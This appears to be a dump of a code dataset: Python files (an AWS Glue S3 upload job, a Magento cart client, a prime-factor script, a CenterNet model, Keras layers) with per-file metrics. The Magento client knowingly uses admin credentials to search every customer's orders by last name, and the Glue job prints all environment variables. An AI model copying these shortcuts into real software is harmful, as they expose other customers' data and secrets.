hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ee7d13ac1bfb50aa14e3d432688e96e955f612d9
| 1,615
|
py
|
Python
|
scripts/python3-shell-job-example.py
|
pfeilbr/aws-glue-playground
|
52648d527a03e32ae1cc6e2f9fcf418e0875021e
|
[
"MIT"
] | null | null | null |
scripts/python3-shell-job-example.py
|
pfeilbr/aws-glue-playground
|
52648d527a03e32ae1cc6e2f9fcf418e0875021e
|
[
"MIT"
] | null | null | null |
scripts/python3-shell-job-example.py
|
pfeilbr/aws-glue-playground
|
52648d527a03e32ae1cc6e2f9fcf418e0875021e
|
[
"MIT"
] | null | null | null |
import datetime
import time
import boto3
import sys
import os
import importlib
print('sys.argv:\n{}\n\n'.format(sys.argv))
print('os.environ:\n{}\n\n'.format(os.environ))
# only run the following if running in aws glue environment (not availble locally)
if 'GLUE_INSTALLATION' in os.environ:
aws_glue_utils = importlib.import_module('awsglue.utils')
args = aws_glue_utils.getResolvedOptions(sys.argv,
['example_argument_0',
'example_argument_1'])
print('example_argument_0 is {}\n\n'.format(args['example_argument_0']))
print('example_argument_1 is {}\n\n'.format(args['example_argument_1']))
ts = time.time()
timestamp_string = datetime.datetime.fromtimestamp(
ts).strftime('%Y-%m-%d_%H.%M.%S')
s3 = boto3.client('s3')
bucket_name = 'aws-glue-playground-01'
bucket_directory = 'tmp'
print('__file__: {}'.format(__file__))
script_file_path = os.path.abspath(__file__)
print('script_file_path: {}'.format(script_file_path))
script_directory_path = os.path.dirname(script_file_path)
print('script_directory_path: {}'.format(script_directory_path))
local_file_path = os.path.abspath(
'{}/{}-hello.txt'.format(script_directory_path, timestamp_string))
print('local_file_path: {}'.format(local_file_path))
local_file_name = os.path.basename(local_file_path)
print('local_file_name: {}'.format(local_file_name))
open(local_file_path, "w").write('Hello, world!')
key = '{}/{}'.format(bucket_directory, local_file_name)
s3.upload_file(local_file_path, bucket_name, key)
os.remove(local_file_path)
| 33.645833
| 82
| 0.712693
| 227
| 1,615
| 4.735683
| 0.30837
| 0.08186
| 0.084651
| 0.016744
| 0.093023
| 0.053953
| 0.053953
| 0
| 0
| 0
| 0
| 0.009339
| 0.138081
| 1,615
| 47
| 83
| 34.361702
| 0.762931
| 0.049536
| 0
| 0
| 0
| 0
| 0.2394
| 0.028702
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0.257143
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee7f1ffa3ae65649a2137010308390975957d2f4
| 7,570
|
py
|
Python
|
magentoclient.py
|
smileinnovation/snips-magento-skill
|
c8fe2d1615fce688bcad9258560895a5798c03c2
|
[
"Apache-2.0"
] | null | null | null |
magentoclient.py
|
smileinnovation/snips-magento-skill
|
c8fe2d1615fce688bcad9258560895a5798c03c2
|
[
"Apache-2.0"
] | null | null | null |
magentoclient.py
|
smileinnovation/snips-magento-skill
|
c8fe2d1615fce688bcad9258560895a5798c03c2
|
[
"Apache-2.0"
] | null | null | null |
import requests
import time
CLIENT_TOKEN_URI = "rest/V1/integration/customer/token"
GET_CART_URI = "rest/default/V1/carts/mine"
GET_CART_ITEM_URI = "rest/default/V1/carts/mine/items"
ADD_TO_CART_URI = "rest/default/V1/carts/mine/items"
ME_URI = "rest/default/V1/customers/me"
DELETE_ITEM_URI = "rest/default/V1/carts/mine/items/{}"
### SHOULD NOT EXISTS... FOR DEMO PURPOSE ONLY
ADMIN_TOKEN_URI = "rest/V1/integration/admin/token"
ORDER_URI = "rest/default/V1/orders"
ORDER_SEARCH_CRITERIA="searchCriteria[filter_groups][0][filters][0][field]=customer_lastname" \
"&searchCriteria[filter_groups][0][filters][0][value]={}" \
"&searchCriteria[filter_groups][0][filters][0][condition_type]=eq" \
"&searchCriteria[sortOrders][0][field]=created_at"
# Magento API call wrapper : catch 401 and try to recover it by refreshing the auth token
def __magento_client__(retry_interval=1, max_retry=1, fallback_return=None):
def decorator(func):
def wrapper(self, *args, **kwargs):
retry = 0
while max_retry == 0 or (max_retry > 0 and retry < max_retry):
try:
return func(self, *args, **kwargs)
except MagentoClientError as mce:
if mce.status_code == 401:
self._MagentoClient__get_client_token()
time.sleep(retry_interval)
retry += 1 if max_retry > 0 else 0
continue
if fallback_return is not None:
return fallback_return
return wrapper
return decorator
class MagentoClientError(Exception):
def __init__(self, message, status_code):
super(MagentoClientError, self).__init__(message)
self.status_code = status_code
class MagentoStockIssueError(Exception):
def __init__(self, message, status_code, item):
super(MagentoStockIssueError, self).__init__(message)
self.status_code = status_code
self.item = item
class MagentoClient:
def __init__(self, host, login, password, admin="", admin_password=""):
self.__host = host
self.__login = login
self.__password = password
### THIS IS UGLY AND DANGEROUS... A MAGENTO CUSTOM API SHOULD EXISTS TO AVOID THIS !!! THIS IS FOR DEMO PURPOSE ONLY!!!
self.__admin = admin
self.__admin_password = admin_password
### ...........................................
self.__get_client_token()
@staticmethod
def __process_response(response, item=""):
# Everything ok
if response.status_code == 200:
return response.json()
# Auth error => we raise client error exception with 401 status code
elif response.status_code == 401:
raise MagentoClientError(message=response.json()['message'], status_code=response.status_code)
# Add item to cart return stock issue => we raise Stock exception
elif response.status_code == 400 and response.json()['message'] and response.json()['message'].encode('utf-8').startswith("We don't have as many"):
raise MagentoStockIssueError(message=response.json()['message'], status_code=response.status_code, item=item)
# Any other error else => we raise client error exception
else:
raise MagentoClientError(message="Something went wrong with Magento: {}".format(response.content), status_code=response.status_code)
def __build_url(self, uri, query=None):
if query is None:
return "{}/{}".format(self.__host.rstrip('/'), uri)
else:
return "{}/{}?{}".format(self.__host.rstrip('/'), uri, query)
def __auth_header(self):
return {'Authorization': 'Bearer {}'.format(self.__current_token)}
def __custom_auth_header(self, token):
return {'Authorization': 'Bearer {}'.format(token)}
def __get_client_token(self):
token_response = requests.post(
url=self.__build_url(CLIENT_TOKEN_URI),
json={
'username': self.__login,
'password': self.__password
}
)
self.__current_token = MagentoClient.__process_response(token_response)
def __get_customer_lastname(self):
return MagentoClient.__process_response(requests.get(
url=self.__build_url(ME_URI),
headers=self.__auth_header()
))['lastname']
def __get_admin_token(self):
token_response = requests.post(
url=self.__build_url(ADMIN_TOKEN_URI),
json={
'username': self.__admin,
'password': self.__admin_password
}
)
return MagentoClient.__process_response(token_response)
@__magento_client__(max_retry=3, fallback_return=[])
def get_cart_items(self):
items_response = MagentoClient.__process_response(requests.get(
url=self.__build_url(GET_CART_ITEM_URI),
headers=self.__auth_header()
))
# We capture only elements we need
return map(lambda item: (item['sku'], item['qty'], item['name'].encode('utf-8')), items_response)
@__magento_client__(max_retry=3, fallback_return=0)
def add_items(self, items):
# First we need to get a the cart id to be able to insert items into it
cart_response = requests.get(
url=self.__build_url(GET_CART_URI),
headers=self.__auth_header()
)
quote_id = MagentoClient.__process_response(cart_response)['id']
# The item list must be transform into something Magento can understand
magento_items = map(lambda i: { 'quote_id': quote_id, 'sku': i[2], 'qty': i[1] }, items)
# Sor I did found any way to insert in bulk all different item...
# so I need to iterate and call the API for each of them
item_added = 0
for magento_item in magento_items:
MagentoClient.__process_response(requests.post(
url=self.__build_url(ADD_TO_CART_URI),
headers=self.__auth_header(),
json={ 'cartItem': magento_item }
), item=magento_item['sku'])
item_added = item_added + 1
return item_added
@__magento_client__(max_retry=3, fallback_return=0)
def purge_cart(self):
# First we need to get a the cart' items to be able to delete each of them
cart_response = requests.get(
url=self.__build_url(GET_CART_URI),
headers=self.__auth_header()
)
cart = MagentoClient.__process_response(cart_response)
cart_items = cart['items']
def remove_item(item_id):
return requests.delete(
url=self.__build_url(DELETE_ITEM_URI.format(item_id)),
headers=self.__auth_header()
)
results = map(lambda i: MagentoClient.__process_response(remove_item(i['item_id'])), cart_items)
return len(results)
@__magento_client__(max_retry=3, fallback_return=[])
def get_orders(self):
customer_lastname = self.__get_customer_lastname()
admin_token = self.__get_admin_token()
query_parameters = ORDER_SEARCH_CRITERIA.format(customer_lastname)
url = self.__build_url(ORDER_URI, query_parameters)
headers = self.__custom_auth_header(admin_token)
return MagentoClient.__process_response(requests.get(
url=url,
headers=headers
))['items']
| 36.926829
| 155
| 0.634346
| 897
| 7,570
| 5.004459
| 0.209588
| 0.03787
| 0.024059
| 0.030074
| 0.363555
| 0.278458
| 0.23591
| 0.185565
| 0.138784
| 0.052573
| 0
| 0.009434
| 0.25786
| 7,570
| 204
| 156
| 37.107843
| 0.789605
| 0.113078
| 0
| 0.164286
| 0
| 0
| 0.108436
| 0.071194
| 0
| 0
| 0
| 0
| 0
| 1
| 0.128571
| false
| 0.035714
| 0.014286
| 0.028571
| 0.278571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee810690b40aba06e4d511080b16348fc6e69b8a
| 533
|
py
|
Python
|
problem_3/problem_3.py
|
CaioTeixeira95/Euler
|
90e98f4110b7e6dc7d36f53eea0b22cf455ac005
|
[
"MIT"
] | null | null | null |
problem_3/problem_3.py
|
CaioTeixeira95/Euler
|
90e98f4110b7e6dc7d36f53eea0b22cf455ac005
|
[
"MIT"
] | null | null | null |
problem_3/problem_3.py
|
CaioTeixeira95/Euler
|
90e98f4110b7e6dc7d36f53eea0b22cf455ac005
|
[
"MIT"
] | null | null | null |
import math
# A function to print all prime factors of
# a given number n
def prime_factor(n):
# Print the number of two's that divide n
while n % 2 == 0:
n = n / 2
# n must be odd at this point
# so a skip of 2 ( i = i + 2) can be used
for i in range(3, int(math.sqrt(n)) + 1, 2):
# while i divides n , print i ad divide n
while n % i == 0:
n = n / i
# Condition if n is a prime
# number greater than 2
if n > 2:
print(n)
prime_factor(600851475143)
| 20.5
| 49
| 0.553471
| 97
| 533
| 3.020619
| 0.505155
| 0.020478
| 0.081911
| 0.088737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067449
| 0.360225
| 533
| 25
| 50
| 21.32
| 0.791789
| 0.474672
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.1
| 0
| 0.2
| 0.1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee811e9426fe3dcfed1e5b99abbfc02ac9fd2eea
| 8,038
|
py
|
Python
|
ppdet/modeling/architectures/centernet.py
|
ZeHuiGong/AFSM
|
54af2f072071779789ba0baa4e4270a1403fd0dd
|
[
"Apache-2.0"
] | 27
|
2020-12-07T10:46:39.000Z
|
2021-08-01T08:56:33.000Z
|
ppdet/modeling/architectures/centernet.py
|
ZeHuiGong/AFSM
|
54af2f072071779789ba0baa4e4270a1403fd0dd
|
[
"Apache-2.0"
] | 4
|
2020-12-18T08:06:15.000Z
|
2021-08-01T02:54:50.000Z
|
ppdet/modeling/architectures/centernet.py
|
ZeHuiGong/AFSM
|
54af2f072071779789ba0baa4e4270a1403fd0dd
|
[
"Apache-2.0"
] | 4
|
2020-12-18T04:37:42.000Z
|
2020-12-31T02:08:33.000Z
|
# AUTHOR: Zehui Gong
# DATE: 2020/6/16
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import OrderedDict
import copy
from paddle import fluid
from paddle.fluid.param_attr import ParamAttr
from paddle.fluid.initializer import Xavier, Constant
from ppdet.core.workspace import register
import numpy as np
from ppdet.utils.check import check_version
from .cornernet_squeeze import rescale_bboxes
from .input_helper import corner_multiscale_def
from .AdativeFeatureSelection import FeatureFusion, AdaptFeatureFusionV1
__all__ = ['CenterNet']
@register
class CenterNet(object):
"""Args:
single_scale (bool): a flag that represents whether use single scale feature (e.g., level3)
or multi-scale feature fusion (fuse features across various resolutions) to predict
the final heatmap and size.
"""
__category__ = 'architecture'
__inject__ = ['backbone', 'neck', 'head']
__shared__ = ['num_classes']
def __init__(self,
backbone,
neck=None,
head='CenterHead',
num_classes=80,
single_scale=True,
spatial_scales=[0.25]):
check_version('1.8.0')
super(CenterNet, self).__init__()
self.backbone = backbone
self.neck = neck
self.head = head
self.num_classes = num_classes
self.single_scale = single_scale
self.spatial_scales = spatial_scales
def extract_feat(self, x):
body_feats = self.backbone(x)
if self.neck is not None:
# the input and output for bifpn are list or tuple
if self.neck.__class__.__name__ in ['BiFPN']:
body_feats = tuple(body_feats.values())
body_feats = self.neck(body_feats)
body_feats = body_feats[::-1]
else:
body_feats, _ = self.neck.get_output(body_feats)
body_feats = list(body_feats.values())
else:
body_feats = list(body_feats.values())
# feature_fusion = FeatureFusion(self.single_scale, self.spatial_scales)
feature_fusion = AdaptFeatureFusionV1(spatial_scales=self.spatial_scales,
num_channels=body_feats[0].shape[1])
body_feats = feature_fusion(body_feats)
return body_feats
def build(self, feed_vars, mode='train'):
im = feed_vars['image']
body_feats = self.extract_feat(im)
if mode == 'train':
target_vars = ['heatmaps', 'reg_mask', 'ind', 'wh', 'regrs'] # heat_weight
target = {key: feed_vars[key] for key in target_vars}
self.head.get_output(body_feats)
loss = self.head.get_loss(target)
return loss
elif mode == 'test':
ratios = feed_vars['ratios']
borders = feed_vars['borders']
bboxes, scores, clses = self.head.get_prediction(body_feats[-1])
bboxes = rescale_bboxes(bboxes, ratios, borders)
detections = fluid.layers.concat([clses, scores, bboxes], axis=2)
detections = detections[0]
return {'bbox': detections}
def build_multi_scale(self, feed_vars):
results = {}
for i, scale in enumerate(self.test_scales):
im_name = 'image_scale_{}'.format(scale)
ratio_name = 'ratios_' + im_name
border_name = 'borders_' + im_name
# sizes_name = 'sizes_' + im_name
img = feed_vars[im_name]
ratios = feed_vars[ratio_name]
borders = feed_vars[border_name]
# sizes = feed_vars[sizes_name]
if self.use_flip:
im_name_flip = 'image_flip_scale_{}'.format(scale)
im_flip = feed_vars[im_name_flip]
img = fluid.layers.concat([img, im_flip], axis=0)
body_feats = self.extract_feat(img)
bboxes, scores, clses = self.head.get_prediction(
body_feats[-1], use_flip=self.use_flip)
bboxes = rescale_bboxes(bboxes, ratios, borders)
bboxes = bboxes / scale
detection = fluid.layers.concat([clses, scores, bboxes], axis=2)
det_name = 'bbox_scale_{}'.format(scale)
results[det_name] = detection[0]
return results
def _input_check(self, require_fields, feed_vars):
for var in require_fields:
assert var in feed_vars, \
"{} has no {} field".format(feed_vars, var)
def _inputs_def(self, image_shape, output_size, max_tag_len):
"""output_size: (w, h)"""
im_shape = [None] + image_shape
C = self.num_classes
# yapf: disable
inputs_def = {
'image': {'shape': im_shape, 'dtype': 'float32', 'lod_level': 0},
'im_id': {'shape': [None, 1], 'dtype': 'int64', 'lod_level': 0},
'gt_bbox': {'shape': [None, 4], 'dtype': 'float32', 'lod_level': 1},
'gt_class': {'shape': [None, 1], 'dtype': 'int32', 'lod_level': 1},
'ratios': {'shape': [None, 2], 'dtype': 'float32', 'lod_level': 0},
'borders': {'shape': [None, 4], 'dtype': 'float32', 'lod_level': 0},
'sizes': {'shape': [None, 2], 'dtype': 'float32', 'lod_level': 0},
'heatmaps': {'shape': [None, C, output_size[1], output_size[0]], 'dtype': 'float32', 'lod_level': 0},
'regrs': {'shape': [None, max_tag_len, 2], 'dtype': 'float32', 'lod_level': 0},
'reg_mask': {'shape': [None, max_tag_len], 'dtype': 'float32', 'lod_level': 0},
'ind': {'shape': [None, max_tag_len], 'dtype': 'int64', 'lod_level': 0},
'wh': {'shape': [None, max_tag_len, 2], 'dtype': 'float32', 'lod_level': 0},
'tlbr': {'shape': [None, 2, output_size[1], output_size[0]], 'dtype': 'float32', 'lod_level': 0},
'tlbr_mask': {'shape': [None, 1, output_size[1], output_size[0]], 'dtype': 'float32', 'lod_level': 0},
'heat_weight': {'shape': [None, C, output_size[1], output_size[0]], 'dtype': 'float32', 'lod_level': 0},
'is_difficult': {'shape': [None, 1], 'dtype': 'int32', 'lod_level': 0},
}
# yapf: enable
return inputs_def
def build_inputs(
self,
image_shape=[3, None, None],
fields=[
'image', 'im_id', 'gt_box', 'gt_class', 'heatmaps',
'regrs', 'reg_mask', 'ind', 'wh',
], # for train
multi_scale=False,
test_scales=[1.0],
use_flip=None,
output_size=[128, 128],
max_tag_len=128,
use_dataloader=True,
iterable=False):
inputs_def = self._inputs_def(image_shape, output_size, max_tag_len)
fields = copy.deepcopy(fields)
if multi_scale:
ms_def, ms_fields = corner_multiscale_def(image_shape, test_scales, use_flip)
inputs_def.update(ms_def)
fields += ms_fields
self.use_flip = use_flip
self.test_scales = test_scales
feed_vars = OrderedDict([(key, fluid.data(
name=key,
shape=inputs_def[key]['shape'],
dtype=inputs_def[key]['dtype'],
lod_level=inputs_def[key]['lod_level'])) for key in fields])
loader = fluid.io.DataLoader.from_generator(
feed_list=list(feed_vars.values()),
capacity=64,
use_double_buffer=True,
iterable=iterable) if use_dataloader else None
return feed_vars, loader
def train(self, feed_vars):
return self.build(feed_vars, mode='train')
def eval(self, feed_vars, multi_scale=None):
if multi_scale:
return self.build_multi_scale(feed_vars)
return self.build(feed_vars, mode='test')
def test(self, feed_vars):
return self.build(feed_vars, mode='test')
| 41.647668
| 116
| 0.58323
| 965
| 8,038
| 4.574093
| 0.219689
| 0.043498
| 0.028546
| 0.054372
| 0.263706
| 0.22406
| 0.181921
| 0.142501
| 0.110784
| 0.083371
| 0
| 0.01913
| 0.291117
| 8,038
| 192
| 117
| 41.864583
| 0.755528
| 0.061707
| 0
| 0.063694
| 0
| 0
| 0.107472
| 0
| 0
| 0
| 0
| 0
| 0.006369
| 1
| 0.063694
| false
| 0
| 0.089172
| 0.012739
| 0.242038
| 0.006369
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee81731e37bb731eaceac3e8565f9dcaff9847fa
| 55,219
|
py
|
Python
|
layers.py
|
kiranscaria/keras_layers
|
1934c4c7a13bfc0be40b224fe586d1c0ffa9f18d
|
[
"MIT"
] | null | null | null |
layers.py
|
kiranscaria/keras_layers
|
1934c4c7a13bfc0be40b224fe586d1c0ffa9f18d
|
[
"MIT"
] | null | null | null |
layers.py
|
kiranscaria/keras_layers
|
1934c4c7a13bfc0be40b224fe586d1c0ffa9f18d
|
[
"MIT"
] | null | null | null |
import numpy as np
import tensorflow as tf
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.layers import Layer, Lambda
from tensorflow.python.keras.layers import InputSpec
from tensorflow.python.ops import nn_ops
from tensorflow.python.keras import initializers, regularizers, constraints, activations
from tensorflow.python.keras.utils import conv_utils
def gaussian_init(shape, dtype=None, partition_info=None):
v = np.random.randn(*shape)
v = np.clip(v, -3, +3)
return K.constant(v, dtype=dtype)
def conv_init_linear(shape, dtype=None, partition_info=None):
v = np.random.randn(*shape)
v = np.clip(v, -3, +3)
fan_in = np.prod(shape[:3])
v = v / (fan_in**0.5)
return K.constant(v, dtype=dtype)
def conv_init_relu(shape, dtype=None, partition_info=None):
v = np.random.randn(*shape)
v = np.clip(v, -3, +3)
fan_in = np.prod(shape[:3])
v = v / (fan_in**0.5) * 2**0.5
return K.constant(v, dtype=dtype)
def conv_init_relu2(shape, dtype=None, partition_info=None):
v = np.random.randn(*shape)
v = np.clip(v, -3, +3)
fan_in = np.prod(shape[:3])
v = v / (fan_in**0.5) * 2
return K.constant(v, dtype=dtype)
def depthwiseconv_init_linear(shape, dtype=None, partition_info=None):
v = np.random.randn(*shape)
v = np.clip(v, -3, +3)
fan_in = np.prod(shape[:2])
v = v / (fan_in**0.5)
return K.constant(v, dtype=dtype)
def depthwiseconv_init_relu(shape, dtype=None, partition_info=None):
v = np.random.randn(*shape)
v = np.clip(v, -3, +3)
fan_in = np.prod(shape[:2])
v = v / (fan_in**0.5) * 2**0.5
return K.constant(v, dtype=dtype)
class Conv2DBaseLayer(Layer):
"""Basic Conv2D class from which other layers inherit.
"""
def __init__(self,
kernel_size,
strides=(1, 1),
padding='valid',
#data_format=None,
dilation_rate=(1, 1),
activation=None,
use_bias=False,
kernel_initializer='glorot_uniform',
kernel_regularizer=None,
kernel_constraint=None,
bias_initializer='zeros',
bias_regularizer=None,
bias_constraint=None,
activity_regularizer=None,
**kwargs):
super(Conv2DBaseLayer, self).__init__(
activity_regularizer=regularizers.get(activity_regularizer), **kwargs)
self.rank = rank = 2
self.kernel_size = conv_utils.normalize_tuple(kernel_size, rank, 'kernel_size')
self.strides = conv_utils.normalize_tuple(strides, rank, 'strides')
self.padding = conv_utils.normalize_padding(padding)
self.dilation_rate = conv_utils.normalize_tuple(dilation_rate, rank, 'dilation_rate')
self.activation = activations.get(activation)
self.use_bias = use_bias
self.kernel_initializer = initializers.get(kernel_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.bias_initializer = initializers.get(bias_initializer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.bias_constraint = constraints.get(bias_constraint)
def get_config(self):
config = super(Conv2DBaseLayer, self).get_config()
config.update({
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'dilation_rate': self.dilation_rate,
'activation': activations.serialize(self.activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'bias_initializer': initializers.serialize(self.bias_initializer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'bias_constraint': constraints.serialize(self.bias_constraint),
'activity_regularizer': regularizers.serialize(self.activity_regularizer),
})
return config
class Conv2D(Conv2DBaseLayer):
"""Conv2D Layer with Weight Normalization.
# Arguments
They are the same as for the normal Conv2D layer.
weightnorm: Boolean flag, whether Weight Normalization is used or not.
# References
[Weight Normalization: A Simple Reparameterization to Accelerate Training of Deep Neural Networks](http://arxiv.org/abs/1602.07868)
"""
def __init__(self, filters, kernel_size, weightnorm=False, eps=1e-6, **kwargs):
super(Conv2D, self).__init__(kernel_size, **kwargs)
self.filters = filters
self.weightnorm = weightnorm
self.eps = eps
def build(self, input_shape):
if type(input_shape) is list:
feature_shape = input_shape[0]
else:
feature_shape = input_shape
self.kernel_shape = (*self.kernel_size, feature_shape[-1], self.filters)
self.kernel = self.add_weight(name='kernel',
shape=self.kernel_shape,
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
if self.weightnorm:
self.wn_g = self.add_weight(name='wn_g',
shape=(self.filters,),
initializer=initializers.Ones(),
trainable=True,
dtype=self.dtype)
if self.use_bias:
self.bias = self.add_weight(name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
super(Conv2D, self).build(input_shape)
def call(self, inputs, **kwargs):
if type(inputs) is list:
features = inputs[0]
else:
features = inputs
if self.weightnorm:
norm = tf.sqrt(tf.reduce_sum(tf.square(self.kernel), (0,1,2)) + self.eps)
kernel = self.kernel / norm * self.wn_g
else:
kernel = self.kernel
features = K.conv2d(features, kernel,
strides=self.strides,
padding=self.padding,
dilation_rate=self.dilation_rate)
if self.use_bias:
features = tf.add(features, self.bias)
if self.activation is not None:
features = self.activation(features)
return features
def get_config(self):
config = super(Conv2D, self).get_config()
config.update({
'filters': self.filters,
'weightnorm': self.weightnorm,
'eps': self.eps,
})
return config
class SparseConv2D(Conv2DBaseLayer):
"""2D Sparse Convolution layer for sparse input data.
# Arguments
They are the same as for the normal Conv2D layer.
binary: Boolean flag, whether the sparsity is propagated as binary
mask or as float values.
# Input shape
features: 4D tensor with shape (batch_size, rows, cols, channels)
mask: 4D tensor with shape (batch_size, rows, cols, 1)
If no mask is provided, all input pixels with features unequal
to zero are considered as valid.
# Example
x, m = SparseConv2D(32, 3, padding='same')(x)
x = Activation('relu')(x)
